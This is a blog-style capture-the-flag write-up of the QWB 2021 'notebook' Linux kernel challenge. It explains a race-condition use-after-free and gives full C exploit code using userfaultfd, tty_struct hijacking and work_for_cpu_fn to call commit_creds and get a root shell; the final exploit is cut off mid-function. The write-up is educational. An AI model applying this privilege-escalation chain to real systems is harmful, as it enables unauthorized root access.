QWB2021-notebook-WP

Posted on Jul 15, 2021

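During the Qiangwang Cup (QWB) I knew nothing about kernel pwn and never even looked at this challenge. Over the last two days I tried to reproduce it. It took me from the afternoon of the day before yesterday until now, which is a lot of time, but I learned a few things along the way. In particular, I ran into things about userfaultfd and the tty attack that I did not know I did not know (no, that is not a typo ^_^).

First, the launch script: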

#!/bin/sh
stty intr ^]
qemu-system-x86_64 \
    -m 64M \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" \
    -nographic -net user -net nic -device e1000 \
    -smp cores=2,threads=2 -cpu kvm64,+smep,+smap \
    -monitor /dev/null 2>/dev/null -s

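The -append line sets loglevel to 3. I recommend removing that while debugging: the driver's printk output then shows up on the console, which makes it easier to tell what is going on.

Running it, boot takes about 20 seconds, which is annoyingly slow. I do not know the exact cause, but it is related to the contents of the etc directory. Leaving that directory out when repacking the rootfs saves a lot of waiting.

The driver logic is fairly simple and the symbols are not stripped, so I will skip the walkthrough. The main bug is a UAF caused by a race condition.

First, a word on read-write locks. My operating systems course did not cover them thoroughly, and because I did not know their properties I spent all of yesterday unable to understand why the race would not play out the way I expected. They are actually easy to understand:

  • While the write lock is held, every attempt to take the lock (read or write) blocks
  • While a read lock is held, attempts to take the write lock block (other readers are still admitted)

Used properly, a read-write lock keeps threads synchronized while still improving performance. The challenge driver takes the read lock in noteedit and noteadd and takes the write lock only in notedel. The remaining operations are not protected by any lock. Both read-locked operations actually perform writes, yet they can run concurrently, so a race condition is very likely.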

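In the relevant part of noteedit, krealloc is called with no limit on newsize (and with newsize 0 it simply frees the buffer). The note pointer is also not updated right away: a copy_from_user sits in front of the update. We can therefore use userfaultfd to stall the thread at that point so that the note pointer is never updated, which leaves us holding a pointer to a slab object that has already been kfree'd. The catch is that the note's size has been set to 0 by then, so read and write can no longer transfer any data.

The add operation, however, has a similarly placed copy_from_user. By the time a thread stalls there the slot's size has already been written, so stalling an add with size 0x60 brings the size back to 0x60.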
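The edit half of this race can be modelled in user space. The sketch below is a toy under stated assumptions, not the driver's code: struct toy_note, toy_edit and the two semaphores are hypothetical, a semaphore wait stands in for the copy_from_user that userfaultfd keeps parked, and a flag stands in for the real kfree so nothing is actually freed.

```c
#include <assert.h>
#include <pthread.h>
#include <semaphore.h>
#include <stddef.h>

/* Toy model of one notebook slot; NOT the driver's real data structure. */
struct toy_note {
    void  *ptr;     /* pointer the slot still publishes */
    size_t size;
    int    freed;   /* set once the backing buffer counts as released */
};

struct toy_ctx {
    struct toy_note note;
    sem_t reached_copy;  /* edit thread -> main: "I am inside the copy" */
    sem_t resume_copy;   /* main -> edit thread: stand-in for resolving the fault */
};

/* Models the edit path: resize to 0 (free), park in the copy, then update ptr. */
static void *toy_edit(void *arg)
{
    struct toy_ctx *ctx = arg;

    ctx->note.size  = 0;           /* size is written early */
    ctx->note.freed = 1;           /* krealloc(ptr, 0) releases the buffer */

    sem_post(&ctx->reached_copy);  /* the copy faults here ... */
    sem_wait(&ctx->resume_copy);   /* ... and stays parked until resumed */

    ctx->note.ptr = NULL;          /* the pointer update comes only after the copy */
    return NULL;
}

/* Returns 1 if the slot still holds the released pointer while the edit is parked. */
int toy_stale_pointer_observed(void)
{
    static char backing[0x60];
    struct toy_ctx ctx = { .note = { backing, sizeof(backing), 0 } };
    pthread_t thr;
    int stale, rc;

    sem_init(&ctx.reached_copy, 0, 0);
    sem_init(&ctx.resume_copy, 0, 0);
    rc = pthread_create(&thr, NULL, toy_edit, &ctx);
    assert(rc == 0);
    (void)rc;

    sem_wait(&ctx.reached_copy);   /* the edit thread is now "stuck" */
    stale = ctx.note.freed && ctx.note.ptr == backing && ctx.note.size == 0;

    sem_post(&ctx.resume_copy);    /* let the thread finish so it can be joined */
    pthread_join(thr, NULL);
    sem_destroy(&ctx.reached_copy);
    sem_destroy(&ctx.resume_copy);
    return stale;
}
```

In the real exploit the stalled thread is never resumed (the fault handler calls pause()), so the stale pointer stays in the slot for the rest of the run. The model resumes the thread only so that it can be joined cleanly.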

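That gives us two primitives:

  • Allocate a slab object of arbitrary size. add caps the size at 0x60, but edit can krealloc it to any size
  • UAF on a slab object of arbitrary size, although only its first 0x60 bytes can be read and written

The plan is therefore to use the UAF to get arbitrary read and write over the first 0x60 bytes of a tty_struct and leak kernel addresses. ROP would work from there, but while reading Chaitin's (长亭) writeup I learned a very neat trick (link to the original). Quoting it:

Once rip is under control, the next step is bypassing SMEP and SMAP. Here is a trick that works very well when the tty object is fully controlled: no ROP at all, very simple, and very stable (after our exploit succeeds, the program can exit normally, and even a shutdown does not trigger a kernel panic).

The kernel contains a function like this:

[image: source code of work_for_cpu_fn]

After compilation it looks roughly like this:

[image: disassembly of work_for_cpu_fn]

This function is part of the workqueue implementation, and any kernel built with multi-core support (CONFIG_SMP) contains its code. It is easy to see how useful it is: as long as we control the memory that the first argument points to, we can call an arbitrary function with one arbitrary argument and have the return value stored back into that same memory. The "gadget" also returns cleanly, and SMAP and SMEP never come into play while it runs. Because the first argument of many in-kernel read / write / ioctl implementations happens to be the object itself, it fits this scenario extremely well. Since all we need for privilege escalation is commit_creds(prepare_kernel_cred(0)), two invocations of the call primitive above are enough. (If you also need to disable SELinux or the like, find a gadget that writes 0 to an arbitrary address; those are easy to find.)

With this primitive, calling arbitrary functions becomes fairly easy.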
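The images from the quoted writeup did not survive, so here is a hedged userland model of the primitive instead. It assumes the usual x86-64 layout in which struct work_struct occupies 0x20 bytes (no lockdep), which matches the offsets 0x20, 0x28 and 0x30 used by the exploits in this post. All toy_ names are hypothetical, and toy_prepare and toy_commit are only stand-ins for prepare_kernel_cred and commit_creds.

```c
#include <assert.h>
#include <stddef.h>

/* Stand-in for struct work_struct: 0x20 bytes on x86-64 without lockdep (assumption). */
struct toy_work_struct {
    long  data;
    void *entry_next;
    void *entry_prev;
    void (*func)(struct toy_work_struct *);
};

/* Same member order as the kernel's struct work_for_cpu. */
struct toy_work_for_cpu {
    struct toy_work_struct work;  /* offset 0x00 */
    long (*fn)(void *);           /* offset 0x20: function to call */
    void *arg;                    /* offset 0x28: its single argument */
    long  ret;                    /* offset 0x30: where the result is stored */
};

/* Mirrors what work_for_cpu_fn does: ret = fn(arg). */
void toy_work_for_cpu_fn(struct toy_work_struct *work)
{
    struct toy_work_for_cpu *wfc = (struct toy_work_for_cpu *)work;

    wfc->ret = wfc->fn(wfc->arg);
}

/* Hypothetical stand-ins for prepare_kernel_cred and commit_creds. */
static long toy_prepare(void *daemon) { return daemon == NULL ? 0x1234 : -1; }
static long toy_commit(void *cred)    { return (long)cred == 0x1234 ? 0 : -1; }

/* Two invocations of the primitive, feeding the first result into the second. */
long toy_two_stage_call(void)
{
    struct toy_work_for_cpu obj = {0};

    obj.fn  = toy_prepare;
    obj.arg = NULL;
    toy_work_for_cpu_fn(&obj.work);   /* stage 1: ret = toy_prepare(NULL) */

    obj.fn  = toy_commit;
    obj.arg = (void *)obj.ret;        /* reuse the value stored at offset 0x30 */
    toy_work_for_cpu_fn(&obj.work);   /* stage 2: ret = toy_commit(cred) */

    return obj.ret;
}
```

In the exploit the controlled object is the tty_struct itself, which is why qword indices 4, 5 and 6 of the buffer (byte offsets 0x20, 0x28, 0x30) carry the function, its argument and the return value.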

7.15: a failed attempt

Based on the analysis and the small trick above, I wrote my own exp:

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <syscall.h>
#include <poll.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include <stdint.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <assert.h>

#define PAGE_SIZE 0x1000
#define TTY_STRUCT_SZIE 0x2E0

size_t work_for_cpu_fn_off = 0xffffffff8949eb90 - 0xffffffff8a28e440;
size_t prepare_kernel_cred_off = 0xffffffffa14a9ef0 - 0xffffffffa228e440;
size_t commit_creds_off = 0xffffffffa14a9b40 - 0xffffffffa228e440;

struct userarg
{
	size_t idx;
	size_t size;
	void* buf;
};

int note_fd;
void* stuck_mapped_memory;

void ErrExit(char* err_msg)
{
	puts(err_msg);
	exit(-1);
}

void RegisterUserfault(void *fault_page, void* handler)
{
	pthread_t thr;
	struct uffdio_api ua;
	struct uffdio_register ur;
	uint64_t uffd  = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
	ua.api = UFFD_API;
	ua.features    = 0;
	if (ioctl(uffd, UFFDIO_API, &ua) == -1)
		ErrExit("[-] ioctl-UFFDIO_API");

	ur.range.start = (unsigned long)fault_page; // the region we want to monitor
	ur.range.len   = PAGE_SIZE;
	ur.mode        = UFFDIO_REGISTER_MODE_MISSING;
	if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1) // register for missing-page faults; a thread that faults here blocks while we act from another thread
		ErrExit("[-] ioctl-UFFDIO_REGISTER");
	// start a thread that receives the fault events and handles them
	int s = pthread_create(&thr, NULL,handler, (void*)uffd);
	if (s!=0)
		ErrExit("[-] pthread_create");
}

void noteadd(size_t idx, size_t size, void* buf)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = size;
	notearg.buf = buf;
	ioctl(note_fd, 0x100, &notearg);
}

void notegift(void* buf)
{
	struct userarg notearg;
	notearg.idx = 0;
	notearg.size = 0;
	notearg.buf = buf;
	ioctl(note_fd, 0x64, &notearg);
}

void notedel(size_t idx)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = 0;
	notearg.buf = NULL;
	ioctl(note_fd, 0x200, &notearg);
}

void noteedit(size_t idx, size_t size, void* buf)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = size;
	notearg.buf = buf;
	ioctl(note_fd, 0x300, &notearg);
}

void OpenNote()
{
	note_fd = open("/dev/notebook", O_RDWR);
	if (note_fd < 0)
	{
		ErrExit("[-] err in open notebook device");
	}
}

void* userfaultfd_sleep3_handler(void* arg)
{
	struct uffd_msg msg;
	unsigned long uffd = (unsigned long) arg;
	puts("[+] sleep3 handler created");
	int nready;
	struct pollfd pollfd;
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	nready = poll(&pollfd, 1, -1);
	puts("[+] sleep3 handler unblocked");
	sleep(3);
	if (nready != 1)
	{
		ErrExit("[-] Wrong poll return val");
	}
	nready = read(uffd, &msg, sizeof(msg));
	if (nready <= 0)
	{
		ErrExit("[-] msg err");
	}

	char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (page == MAP_FAILED)
	{
		ErrExit("[-] mmap err");
	}
	struct uffdio_copy uc;
	// zero the whole page; sizeof(page) would only be the size of the pointer
	memset(page, 0, PAGE_SIZE);
	uc.src = (unsigned long) page;
	uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
	uc.len = PAGE_SIZE;
	uc.mode = 0;
	uc.copy = 0;
	ioctl(uffd, UFFDIO_COPY, &uc);
	puts("[+] sleep3 handler done");
	return NULL;
}

void* userfaultfd_stuck_handler(void* arg)
{
	struct uffd_msg msg;
	unsigned long uffd = (unsigned long) arg;
	puts("[+] stuck handler created");
	int nready;
	struct pollfd pollfd;
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	nready = poll(&pollfd, 1, -1);
	puts("[+] stuck handler unblocked");
	pause();
	if (nready != 1)
	{
		ErrExit("[-] Wrong poll return val");
	}
	nready = read(uffd, &msg, sizeof(msg));
	if (nready <= 0)
	{
		ErrExit("[-] msg err");
	}

	char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (page == MAP_FAILED)
	{
		ErrExit("[-] mmap err");
	}
	struct uffdio_copy uc;
	// zero the whole page; sizeof(page) would only be the size of the pointer
	memset(page, 0, PAGE_SIZE);
	uc.src = (unsigned long) page;
	uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
	uc.len = PAGE_SIZE;
	uc.mode = 0;
	uc.copy = 0;
	ioctl(uffd, UFFDIO_COPY, &uc);
	puts("[+] stuck handler done");
	return NULL;
}

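void* edit_thread(void* arg)
{
	size_t idx = (size_t) arg; // pthread entry points take void*; the index travels in the pointer value
	puts("[+] edit thread start!");
	noteedit(idx, 0, stuck_mapped_memory);
	puts("[+] edit thread end!"); // won't reach here
	return NULL;
}

void* add_thread(void* arg)
{
	size_t idx = (size_t) arg; // same convention as edit_thread
	puts("[+] add thread start!");
	noteadd(idx, 0x60, stuck_mapped_memory);
	puts("[+] add thread end!"); // won't reach here
	return NULL;
}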

char buf_a[0x500] = {"aaa"};
size_t buf_tty[0x100], buf_fake_table[0x500];

int main()
{
	int pid;
	int tty_fd;

	stuck_mapped_memory = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
	RegisterUserfault(stuck_mapped_memory, userfaultfd_stuck_handler);

	OpenNote();

	noteadd(0, 0x60, buf_a);
	noteedit(0, TTY_STRUCT_SZIE, buf_a);
	write(note_fd, buf_a, 0);


	pthread_t thr_edit, thr_add;
	pthread_create(&thr_edit, NULL, edit_thread, 0);
	sleep(1);
	pthread_create(&thr_add, NULL, add_thread, 0);
	sleep(1);
	puts("ready to open ptmx");
	for (int i = 0; i < 20; i++)
	{
		tty_fd = open("/dev/ptmx", O_RDWR);
		if (tty_fd < 0)
		{
			ErrExit("[-] ptmx open failed!");
		}
		read(note_fd, buf_tty, 0);
		if (buf_tty[0] == 0x100005401)
		{
			printf("[+] tty_struct found! fd = %d\n", tty_fd);
			break; // tty_struct used our slab
		}
	}
	if (buf_tty[0] != 0x100005401)
	{
		ErrExit("[-] leak failed");
	}

	size_t ptm_unix98_ops_addr = buf_tty[3];
	size_t work_for_cpu_fn_addr =  work_for_cpu_fn_off + ptm_unix98_ops_addr;
	size_t tty_struct_addr = buf_tty[10] - 0x50;
	size_t commit_creds_addr = commit_creds_off + ptm_unix98_ops_addr;
	size_t prepare_kernel_cred_addr = prepare_kernel_cred_off + ptm_unix98_ops_addr;

	printf("[+] ptm_unix98_ops addr leaked, addr: 0x%lx\n", ptm_unix98_ops_addr);
	printf("[+] work_for_cpu_fn addr leaked, addr: 0x%lx\n", work_for_cpu_fn_addr);
	printf("[+] tty_struct addr leaked, addr: 0x%lx\n", tty_struct_addr);

	write(tty_fd, 1, 1);

	size_t buf_gift[0x100];
	notegift(buf_gift);
	size_t note_0_addr = buf_gift[0 * 2];
	assert(note_0_addr == tty_struct_addr);

	buf_tty[3] = tty_struct_addr;
	buf_tty[4] = prepare_kernel_cred_addr;
	buf_tty[5] = 0;
	buf_tty[7] = work_for_cpu_fn_addr;
	write(note_fd, buf_tty, 0); // write to tty_struct

	write(tty_fd, 0, 0);

	read(note_fd, buf_tty, 0);
	printf("[+] prepare_kernel_cred finished, return 0x%lx\n", buf_tty[6]);
	buf_tty[3] = tty_struct_addr;
	buf_tty[4] = commit_creds_addr;
	buf_tty[5] = buf_tty[6];
	buf_tty[7] = work_for_cpu_fn_addr;
	write(note_fd, buf_tty, 0);
	sleep(1);
	puts("[+] write tty finished (second time)");
	write(tty_fd, 0, 0);

	printf("now uid = %d\n", getuid());

	if (getuid() == 0)
	{
		puts("[+] root now!");
		system("/bin/sh");
	}
	else
	{
		exit(-1);
	}

	return 0;
}

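Strangely, after I modify the ops table, calling write does not have the effect I want, and breakpoints set from an attached gdb never hit. Very odd. I will look into it again tomorrow.

The SLUB behavior also confuses me a little. It does not seem to be last-in-first-out, so I have to open ptmx several times, and I use the magic number to tell whether a tty_struct landed in our UAF'd slab object.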
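The constant 0x100005401 used for that check can be read as two 32-bit fields: the tty magic 0x5401 in the low half and a reference count of 1 in the high half. A small sketch of the same test, with hypothetical helper names, makes that explicit:

```c
#include <assert.h>
#include <stdint.h>

#define TTY_MAGIC 0x5401u  /* value stored in tty_struct.magic */

/* Split the first 8 bytes of a leaked object into the two 32-bit fields that
 * the exploit's 0x100005401 comparison implies: magic (low), refcount (high). */
static uint32_t leak_magic(uint64_t first_qword) { return (uint32_t)first_qword; }
static uint32_t leak_kref(uint64_t first_qword)  { return (uint32_t)(first_qword >> 32); }

/* Returns 1 when the qword looks like the start of a freshly opened tty_struct. */
int looks_like_fresh_tty(uint64_t first_qword)
{
    return leak_magic(first_qword) == TTY_MAGIC && leak_kref(first_qword) == 1;
}
```

A buffer that still holds the "aaa" filler, or a tty whose reference count is not 1, fails the test, so the loop simply opens another ptmx and tries again.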

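7.16: finally reproduced

Yesterday's problems were partly solved today. First, a small issue with the leak: the leaked value is the struct's ops table pointer, which may be either ptm_unix98_ops or pty_unix98_ops. The two are only 0x120 apart, so a special case is enough to make the leak reliable: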

if ((ptm_unix98_ops_addr & 0xFFF) == 0x320) ptm_unix98_ops_addr += 0x120;
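The address arithmetic around this leak can be checked in isolation. The sketch below reuses the two sample addresses from the exploit's offset constants; the helper names are made up for illustration. It also shows why storing a "negative" delta in an unsigned type works: the addition wraps around modulo 2^64.

```c
#include <assert.h>
#include <stdint.h>

/* Addresses from one boot, copied from the exploit's offset constants. */
#define SAMPLE_PTM_OPS         0xffffffff8a28e440ULL
#define SAMPLE_WORK_FOR_CPU_FN 0xffffffff8949eb90ULL

/* If the leak is the other ops table (page offset 0x320), move it up by 0x120
 * to the table the offsets were measured against (page offset 0x440). */
uint64_t normalize_ops_leak(uint64_t leaked)
{
    if ((leaked & 0xFFF) == 0x320)
        leaked += 0x120;
    return leaked;
}

/* Rebase work_for_cpu_fn using a delta measured in another boot.
 * The delta is effectively negative, but unsigned wraparound makes the sum correct. */
uint64_t rebase_work_for_cpu_fn(uint64_t leaked_ops)
{
    const uint64_t delta = SAMPLE_WORK_FOR_CPU_FN - SAMPLE_PTM_OPS;

    return normalize_ops_leak(leaked_ops) + delta;
}
```

The page-offset test is safe under KASLR as long as the kernel image is only shifted by multiples of the page size, so the low 12 bits of the leaked pointer identify which of the two tables was leaked.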

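Next, the problem that write would not reach work_for_cpu_fn even after the ops table was modified. I had assumed that, in object-oriented terms, write here dispatches straight to the write virtual function overridden by the tty_struct "class", much like hijacking the write pointer in an _IO_FILE vtable makes write run the hijacked function directly. That is not what happens: tty_write runs first, before the function pointer in the ops table is called.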

static ssize_t tty_write(struct file *file, const char __user *buf,
						size_t count, loff_t *ppos)
{
	struct tty_struct *tty = file_tty(file);
 	struct tty_ldisc *ld;
	ssize_t ret;

	if (tty_paranoia_check(tty, file_inode(file), "tty_write"))
		return -EIO;
	if (!tty || !tty->ops->write ||	tty_io_error(tty))
			return -EIO;
	/* Short term debug to catch buggy drivers */
	if (tty->ops->write_room == NULL)
		tty_err(tty, "missing write_room method\n");
	ld = tty_ldisc_ref_wait(tty);
	if (!ld)
		return hung_up_tty_write(file, buf, count, ppos);
	if (!ld->ops->write)
		ret = -EIO;
	else
		ret = do_tty_write(ld->ops->write, tty, file, buf, count);
	tty_ldisc_deref(ld);
	return ret;
}

do_tty_write then copies the data in from user space, and only after that is the function pointer actually called:

static inline ssize_t do_tty_write(
	ssize_t (*write)(struct tty_struct *, struct file *, const unsigned char *, size_t),
	struct tty_struct *tty,
	struct file *file,
	const char __user *buf,
	size_t count)
{
	ssize_t ret, written = 0;
	unsigned int chunk;

	ret = tty_write_lock(tty, file->f_flags & O_NDELAY);
	if (ret < 0)
		return ret;

	/*
	 * We chunk up writes into a temporary buffer. This
	 * simplifies low-level drivers immensely, since they
	 * don't have locking issues and user mode accesses.
	 *
	 * But if TTY_NO_WRITE_SPLIT is set, we should use a
	 * big chunk-size..
	 *
	 * The default chunk-size is 2kB, because the NTTY
	 * layer has problems with bigger chunks. It will
	 * claim to be able to handle more characters than
	 * it actually does.
	 *
	 * FIXME: This can probably go away now except that 64K chunks
	 * are too likely to fail unless switched to vmalloc...
	 */
	chunk = 2048;
	if (test_bit(TTY_NO_WRITE_SPLIT, &tty->flags))
		chunk = 65536;
	if (count < chunk)
		chunk = count;

	/* write_buf/write_cnt is protected by the atomic_write_lock mutex */
	if (tty->write_cnt < chunk) {
		unsigned char *buf_chunk;

		if (chunk < 1024)
			chunk = 1024;

		buf_chunk = kmalloc(chunk, GFP_KERNEL);
		if (!buf_chunk) {
			ret = -ENOMEM;
			goto out;
		}
		kfree(tty->write_buf);
		tty->write_cnt = chunk;
		tty->write_buf = buf_chunk;
	}

	/* Do the write .. */
	for (;;) {
		size_t size = count;
		if (size > chunk)
			size = chunk;
		ret = -EFAULT;
		if (copy_from_user(tty->write_buf, buf, size))
			break;
		ret = write(tty, file, tty->write_buf, size);
		if (ret <= 0)
			break;
		written += ret;
		buf += ret;
		count -= ret;
		if (!count)
			break;
		ret = -ERESTARTSYS;
		if (signal_pending(current))
			break;
		cond_resched();
	}
	if (written) {
		tty_update_time(&file_inode(file)->i_mtime);
		ret = written;
	}
out:
	tty_write_unlock(tty);
	return ret;
}

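Along this path there are several checks and assorted other work. Yesterday I called

write(tty_fd, 0, 0);

which fails right at copy_from_user. The call needs a valid buf and a nonzero length, for example

write(tty_fd, buf_a, 1);

With that, the hijacked work_for_cpu_fn is reached.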
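The requirement for a readable buffer is not specific to ttys. As a rough userland analogy (a pipe instead of a tty, and a hypothetical helper name), the kernel rejects a one-byte write whose source pointer it cannot read:

```c
#include <assert.h>
#include <errno.h>
#include <unistd.h>

/* Writes one byte from buf into a scratch pipe.
 * Returns 0 on success, otherwise the errno of the failing call. */
int try_one_byte_write(const void *buf)
{
    int fds[2];
    int err = 0;

    if (pipe(fds) != 0)
        return errno;
    if (write(fds[1], buf, 1) != 1)
        err = errno;  /* EFAULT when the kernel cannot copy from buf */
    close(fds[0]);
    close(fds[1]);
    return err;
}
```

Passing a real buffer succeeds, while passing a null pointer yields EFAULT. This only illustrates the copy-from-user check; it does not exercise the tty write path itself.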

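The argument of work_for_cpu_fn is the first argument of the write callback, that is, the tty_struct itself, so the function to be called sits at offset 0x20. That part is fine:

buf_tty[4] = prepare_kernel_cred_addr;

does the job. The argument passed to that function is at offset 0x28, that is,

buf_tty[5] = 0;

This looks fine, but by the time work_for_cpu_fn runs, offset 0x28 has inexplicably become 1, which breaks the call to prepare_kernel_cred. My guess is that tty_write or do_tty_write touches the member at that offset (the member is a semaphore, so it probably changes slightly for thread synchronization).

When the ops table is used for ROP, changes to other members do not matter because no arguments are involved, but calling functions through work_for_cpu_fn requires more care. In the end I followed Chaitin's writeup and triggered through ioctl instead. Similarly, tty_ioctl runs before the function pointer is called, and it is one large switch statement, so the cmd value has to be chosen carefully. A few random values I tried did not work, and I ended up using 233 as in Chaitin's writeup, that is, calling

ioctl(tty_fd, 233, 233);

Apparently the number 233 really does have some magic in it.

The final exp: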

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <syscall.h>
#include <poll.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include <stdint.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <assert.h>

#define PAGE_SIZE 0x1000
#define TTY_STRUCT_SZIE 0x2E0

size_t work_for_cpu_fn_off = 0xffffffff8949eb90 - 0xffffffff8a28e440;
size_t prepare_kernel_cred_off = 0xffffffffa14a9ef0 - 0xffffffffa228e440;
size_t commit_creds_off = 0xffffffffa14a9b40 - 0xffffffffa228e440;
size_t kernel_base;

struct userarg
{
	size_t idx;
	size_t size;
	void* buf;
};

int note_fd;
void* stuck_mapped_memory;

void ErrExit(char* err_msg)
{
	puts(err_msg);
	exit(-1);
}

void RegisterUserfault(void *fault_page, void* handler)
{
	pthread_t thr;
	struct uffdio_api ua;
	struct uffdio_register ur;
	uint64_t uffd  = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
	ua.api = UFFD_API;
	ua.features    = 0;
	if (ioctl(uffd, UFFDIO_API, &ua) == -1)
		ErrExit("[-] ioctl-UFFDIO_API");

	ur.range.start = (unsigned long)fault_page; // the region we want to monitor
	ur.range.len   = PAGE_SIZE;
	ur.mode        = UFFDIO_REGISTER_MODE_MISSING;
	if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1) // register for missing-page faults; a thread that faults here blocks while we act from another thread
		ErrExit("[-] ioctl-UFFDIO_REGISTER");
	// start a thread that receives the fault events and handles them
	int s = pthread_create(&thr, NULL,handler, (void*)uffd);
	if (s!=0)
		ErrExit("[-] pthread_create");
}

void noteadd(size_t idx, size_t size, void* buf)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = size;
	notearg.buf = buf;
	ioctl(note_fd, 0x100, &notearg);
}

void notegift(void* buf)
{
	struct userarg notearg;
	notearg.idx = 0;
	notearg.size = 0;
	notearg.buf = buf;
	ioctl(note_fd, 0x64, &notearg);
}

void notedel(size_t idx)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = 0;
	notearg.buf = NULL;
	ioctl(note_fd, 0x200, &notearg);
}

void noteedit(size_t idx, size_t size, void* buf)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = size;
	notearg.buf = buf;
	ioctl(note_fd, 0x300, &notearg);
}

void OpenNote()
{
	note_fd = open("/dev/notebook", O_RDWR);
	if (note_fd < 0)
	{
		ErrExit("[-] err in open notebook device");
	}
}

void* userfaultfd_sleep3_handler(void* arg)
{
	struct uffd_msg msg;
	unsigned long uffd = (unsigned long) arg;
	puts("[+] sleep3 handler created");
	int nready;
	struct pollfd pollfd;
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	nready = poll(&pollfd, 1, -1);
	puts("[+] sleep3 handler unblocked");
	sleep(3);
	if (nready != 1)
	{
		ErrExit("[-] Wrong poll return val");
	}
	nready = read(uffd, &msg, sizeof(msg));
	if (nready <= 0)
	{
		ErrExit("[-] msg err");
	}

	char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (page == MAP_FAILED)
	{
		ErrExit("[-] mmap err");
	}
	struct uffdio_copy uc;
	// zero the whole page; sizeof(page) would only be the size of the pointer
	memset(page, 0, PAGE_SIZE);
	uc.src = (unsigned long) page;
	uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
	uc.len = PAGE_SIZE;
	uc.mode = 0;
	uc.copy = 0;
	ioctl(uffd, UFFDIO_COPY, &uc);
	puts("[+] sleep3 handler done");
	return NULL;
}

void* userfaultfd_stuck_handler(void* arg)
{
	struct uffd_msg msg;
	unsigned long uffd = (unsigned long) arg;
	puts("[+] stuck handler created");
	int nready;
	struct pollfd pollfd;
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	nready = poll(&pollfd, 1, -1);
	puts("[+] stuck handler unblocked");
	pause();
	if (nready != 1)
	{
		ErrExit("[-] Wrong poll return val");
	}
	nready = read(uffd, &msg, sizeof(msg));
	if (nready <= 0)
	{
		ErrExit("[-] msg err");
	}

	char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (page == MAP_FAILED)
	{
		ErrExit("[-] mmap err");
	}
	struct uffdio_copy uc;
	// zero the whole page; sizeof(page) would only be the size of the pointer
	memset(page, 0, PAGE_SIZE);
	uc.src = (unsigned long) page;
	uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
	uc.len = PAGE_SIZE;
	uc.mode = 0;
	uc.copy = 0;
	ioctl(uffd, UFFDIO_COPY, &uc);
	puts("[+] stuck handler done");
	return NULL;
}

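void* edit_thread(void* arg)
{
	size_t idx = (size_t) arg; // pthread entry points take void*; the index travels in the pointer value
	puts("[+] edit thread start!");
	noteedit(idx, 0, stuck_mapped_memory);
	puts("[+] edit thread end!"); // won't reach here
	return NULL;
}

void* add_thread(void* arg)
{
	size_t idx = (size_t) arg; // same convention as edit_thread
	puts("[+] add thread start!");
	noteadd(idx, 0x60, stuck_mapped_memory);
	puts("[+] add thread end!"); // won't reach here
	return NULL;
}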

char buf_a[0x500] = {"aaa"};
size_t buf_tty[0x100], buf_fake_table[0x500];

int main()
{
	int pid;
	int tty_fd;

	stuck_mapped_memory = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
	RegisterUserfault(stuck_mapped_memory, userfaultfd_stuck_handler);

	OpenNote();

	noteadd(0, 0x60, buf_a);
	noteadd(1, 0x60, buf_a);
	noteedit(1, 0x500, buf_a);
	noteedit(0, TTY_STRUCT_SZIE, buf_a);
	write(note_fd, buf_a, 0);


	pthread_t thr_edit, thr_add;
	pthread_create(&thr_edit, NULL, edit_thread, 0);
	sleep(1);
	pthread_create(&thr_add, NULL, add_thread, 0);
	sleep(1);
	puts("ready to open ptmx");
	for (int i = 0; i < 20; i++)
	{
		tty_fd = open("/dev/ptmx", O_RDWR);
		if (tty_fd < 0)
		{
			ErrExit("[-] ptmx open failed!");
		}
		read(note_fd, buf_tty, 0);
		if (buf_tty[0] == 0x100005401)
		{
			printf("[+] tty_struct found! fd = %d\n", tty_fd);
			break; // tty_struct used our slab
		}
	}
	if (buf_tty[0] != 0x100005401)
	{
		ErrExit("[-] leak failed");
	}

	size_t ptm_unix98_ops_addr = buf_tty[3];
	if ((ptm_unix98_ops_addr & 0xFFF) == 0x320) ptm_unix98_ops_addr += 0x120;
	size_t work_for_cpu_fn_addr =  work_for_cpu_fn_off + ptm_unix98_ops_addr;
	size_t tty_struct_addr = buf_tty[10] - 0x50;
	size_t commit_creds_addr = commit_creds_off + ptm_unix98_ops_addr;
	size_t prepare_kernel_cred_addr = prepare_kernel_cred_off + ptm_unix98_ops_addr;
	kernel_base = prepare_kernel_cred_addr - 0xA9EF0;

